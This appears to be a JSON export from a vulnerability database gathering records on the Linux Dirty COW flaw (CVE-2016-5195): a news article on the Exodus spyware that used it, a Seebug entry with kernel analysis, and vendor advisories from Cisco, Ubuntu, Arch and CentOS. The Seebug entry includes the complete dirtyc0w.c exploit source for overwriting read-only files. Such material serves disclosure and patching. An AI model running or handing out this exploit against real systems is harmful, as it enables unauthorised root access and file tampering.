"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-09T07:54:53", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://1.bp.blogspot.com/-FYiOvknu4vY/XKxF4mYpV2I/AAAAAAAAztw/qfugwyFZSvUfDpDrIn4JxRzNFmIunzEjwCLcBGAs/s728-e100/ios-malware-min.jpg>)\n\nCybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on the official Google Play Store. \n \nDubbed **Exodus**, as the malware is called, the iOS version of the spyware was discovered by security researchers at LookOut during their analysis of its Android samples they had found last year. \n \nUnlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers. \n\n\n \nSince Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store. \n \n\n\n> \"Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,\" the researchers say in a [blog post](<https://blog.lookout.com/esurv-research>). \n \n\"All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.\"\n\n \nThough the iOS variant is less sophisticated than its Android counterpart, the spyware can still be able to exfiltrate information from targeted iPhone devices including, contacts, audio recordings, photos, videos, GPS location, and device information. \n \nThe stolen data is then transmitted via HTTP PUT requests to an endpoint on the attackers controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols. \n\n\n[](<https://1.bp.blogspot.com/-bbiYR-lAE7Y/XKw-4K1NxFI/AAAAAAAAztY/7pLITJjk3Tg_hA18skRD3OG-OLKlQmsOwCLcBGAs/s728-e100/ios-malware-apple-enterprise-developer-program.png>)\n\n \nSeveral technical details indicated that Exodus was \"likely the product of a well-funded development effort\" and aimed to target the government or law-enforcement sectors. \n \n\n\n> \"These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,\" the researchers say.\n\n \nDeveloped by Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders [discovered](<https://securitywithoutborders.org/blog/2019/03/29/exodus.html>) nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified. \n \nUnder development for at least five years, Exodus for Android usually consists of three distinct stages. First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device. \n\n\n \nThe second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities. \n \nFinally, the third stage uses the infamous [DirtyCOW](<https://thehackernews.com/2017/09/dirty-cow-android-malware.html>) exploit ([CVE-2016-5195](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>)) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance. \n \nThe Android variant is also designed to keep running on the infected device even when the screen is switched off. \n \nWhile the Android version of Exodus had potentially infected \"several hundreds if not a thousand or more\" devices, it's not clear how many iPhones were infected by the iOS Exodus variant. \n \nAfter being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices. \n \nThis is the second instance in the past year when an Italian software company has been caught distributing spyware. Earlier last year, another undisclosed Italian firm was found distributing \"**Skygofree**,\" a [dangerous Android spying tool](<https://thehackernews.com/2018/01/android-spying-malware.html>) that gives hackers full control of infected devices remotely.\n", "modified": "2019-04-09T07:19:48", "published": "2019-04-09T07:19:00", "id": "THN:6681D64EFC53E13356AF1184CE1D6024", "href": "https://thehackernews.com/2019/04/exodus-ios-malware.html", "type": "thn", "title": "'Exodus' Surveillance Malware Found Targeting Apple iOS Users", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:03:04", "description": "### Summary\r\n\r\n\r\nA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.\r\n\r\nThe bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.\r\n\r\nThere are proof of concept available [here](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs).\r\n\r\n### Video Explanation\r\n\r\n\r\n\r\n[link](https://www.youtube.com/watch?v=kEsshExn7aE)\r\n\r\n### Impact\r\n\r\n\r\n* An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\r\n* This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\r\n\r\n### Analysis\r\n \r\n\r\n```\r\n\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n do_fault <- pte is not present\r\n do_cow_fault <- FAULT_FLAG_WRITE\r\n alloc_set_pte\r\n maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty\r\n but keep it RO \r\n# Returns with 0 and retry\r\nfollow_page_mask\r\n follow_page_pte\r\n (flags & FOLL_WRITE) && !pte_write(pte) <- retry fault\r\n\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n FAULT_FLAG_WRITE && !pte_write\r\n do_wp_page\r\n PageAnon() <- this is CoWed page already\r\n reuse_swap_page <- page is exclusively ours\r\n wp_page_reuse\r\n maybe_mkwrite <- dirty but RO again\r\n ret = VM_FAULT_WRITE\r\n((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE\r\n\r\n#Returns with 0 and retry as a read fault\r\ncond_resched -> different thread will now unmap via madvise\r\nfollow_page_mask\r\n !pte_present && pte_none\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n do_fault <- pte is not present\r\n do_read_fault <- this is a read fault and we will get pagecache\r\n page!\r\n```\r\n\r\n### How\r\n\r\n\r\n* The In The Wild exploit relied on writing to /proc/self/mem on one side of the race.\r\n* ptrace(PTRACE_POKEDATA) can write to readonly mappings.\r\n* The attack relies on racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.\r\n\r\n### Commit messages\r\n\r\n\r\n commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6\r\n Author: Linus Torvalds <torvalds@g5.osdl.org>\r\n Date: Mon Aug 1 11:14:49 2005 -0700\r\n\r\n Fix get_user_pages() race for write access\r\n\r\n There's no real guarantee that handle_mm_fault() will always be able to\r\n break a COW situation - if an update from another thread ends up\r\n modifying the page table some way, handle_mm_fault() may end up\r\n requiring us to re-try the operation.\r\n\r\n That's normally fine, but get_user_pages() ended up re-trying it as a\r\n read, and thus a write access could in theory end up losing the dirty\r\n bit or be done on a page that had not been properly COW'ed.\r\n\r\n This makes get_user_pages() always retry write accesses as write\r\n accesses by making \"follow_page()\" require that a writable follow has\r\n the dirty bit set. That simplifies the code and solves the race: if the\r\n COW break fails for some reason, we'll just loop around and try again.\r\n\r\n\r\n\r\n commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\r\n Author: Linus Torvalds <torvalds@linux-foundation.org>\r\n Date: Thu Oct 13 20:07:36 2016 GMT\r\n\r\n This is an ancient bug that was actually attempted to be fixed once\r\n (badly) by me eleven years ago in commit 4ceb5db9757a (\"Fix\r\n get_user_pages() race for write access\") but that was then undone due to\r\n problems on s390 by commit f33ea7f404e5 (\"fix get_user_pages bug\").\r\n\r\n In the meantime, the s390 situation has long been fixed, and we can now\r\n fix it by checking the pte_dirty() bit properly (and do it better). The\r\n s390 dirty bit was implemented in abf09bed3cce (\"s390/mm: implement\r\n software dirty bits\") which made it into v3.9. Earlier kernels will\r\n have to look at the page state itself.\r\n\r\n Also, the VM has become more scalable, and what used a purely\r\n theoretical race back then has become easier to trigger.\r\n\r\n To fix it, we introduce a new internal FOLL_COW flag to mark the \"yes,\r\n we already did a COW\" rather than play racy games with FOLL_WRITE that\r\n is very fundamental, and then use the pte dirty flag to validate that\r\n the FOLL_COW flag is still valid.\r\n\r\n### References\r\n\r\nhttps://dirtycow.ninja \r\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344 \r\nhttps://access.redhat.com/security/vulnerabilities/2706661\r\nhttps://plus.google.com/+KeesCook/posts/UUaXm3PcQ4n\r\nhttps://twitter.com/nelhage/status/789196293629370368\r\nhttps://bugzilla.suse.com/show_bug.cgi?id=1004418#c14", "published": "2016-10-22T00:00:00", "type": "seebug", "title": "Linux kernel 2.6.22 < 3.9 elevation of privilege vulnerability\n(Dirty COW)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92488", "id": "SSV:92488", "sourceData": "\n \r\n/*\r\n####################### dirtyc0w.c #######################\r\n\r\n# \u66f4\u591a\u8be6\u60c5\u89c1\uff1ahttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\r\n\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -pthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n\r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,(uintptr_t) map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3) {\r\n (void)fprintf(stderr, \"%s\\n\",\r\n \"usage: dirtyc0w target_file new_content\");\r\n return 1; }\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %zx\\n\\n\",(uintptr_t) map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92488"}], "cisco": [{"lastseen": "2020-12-24T11:40:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A vulnerability in the memory manager functions of the Linux Kernel could allow unauthenticated, local attackers to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nThe vulnerability is due to a race condition in the memory manager functions of the Linux Kernel. An attacker could exploit this vulnerability by racing the madvise (MADV_DONTNEED) system call. An exploit could allow the attacker to gain write access to otherwise read-only memory mappings. A local user could modify on-disk binaries, bypassing the standard permission mechanisms.\n\nOn October 19, 2016, a new vulnerability related to a race condition in the memory manager of the Linux Kernel was disclosed. This vulnerability could allow unprivileged, local users to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nCisco has released software updates that address this vulnerability. For information about affected and fixed software releases, consult the Cisco bug IDs in the Vulnerable Products table.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux\"]", "modified": "2018-08-16T13:48:18", "published": "2016-10-26T15:00:00", "id": "CISCO-SA-20161026-LINUX", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux", "type": "cisco", "title": "Vulnerability in Linux Kernel Affecting Cisco Products: October 2016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:01:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2017-05-31T00:00:00", "published": "2016-12-07T00:00:00", "id": "HUAWEI-SA-20161207-01-DIRTYCOW", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20161207-01-dirtycow-en", "title": "Security Advisory - Dirty COW Vulnerability in Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-18T01:38:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-2", "href": "https://ubuntu.com/security/notices/USN-3106-2", "title": "Linux kernel (Xenial HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:40:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-3", "href": "https://ubuntu.com/security/notices/USN-3106-3", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:41:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3105-1", "href": "https://ubuntu.com/security/notices/USN-3105-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:41:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3104-2", "href": "https://ubuntu.com/security/notices/USN-3104-2", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 5, "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "USN-3107-2", "href": "https://ubuntu.com/security/notices/USN-3107-2", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:44:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "USN-3105-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3105-2", "href": "https://ubuntu.com/security/notices/USN-3105-2", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:43:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 5, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3107-1", "href": "https://ubuntu.com/security/notices/USN-3107-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:47:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-4", "href": "https://ubuntu.com/security/notices/USN-3106-4", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "Arch Linux Security Advisory ASA-201610-11\n==========================================\n\nSeverity: High\nDate : 2016-10-21\nCVE-ID : CVE-2016-5195\nPackage : linux-lts\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-lts before version 4.4.26-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 4.4.26-1.\n\n# pacman -Syu \"linux-lts>=4.4.26-1\"\n\nThe problem has been fixed upstream in version 4.4.26.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private read-only\nmemory mappings. An unprivileged local user could use this flaw to gain\nwrite access to otherwise read-only memory mappings and thus increase\ntheir privileges on the system.\n\nImpact\n======\n\nAn unprivileged local attacker is able to elevate their privileges on\nthe system and gain root access.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\nhttps://access.redhat.com/security/cve/CVE-2016-5195", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ASA-201610-11", "href": "https://security.archlinux.org/ASA-201610-11", "type": "archlinux", "title": "[ASA-201610-11] linux-lts: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:00", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2105\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034172.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2105.html", "edition": 3, "modified": "2016-10-26T07:33:13", "published": "2016-10-26T07:33:13", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034172.html", "id": "CESA-2016:2105", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2098\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034171.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2098.html", "edition": 3, "modified": "2016-10-25T11:17:10", "published": "2016-10-25T11:17:10", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034171.html", "id": "CESA-2016:2098", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}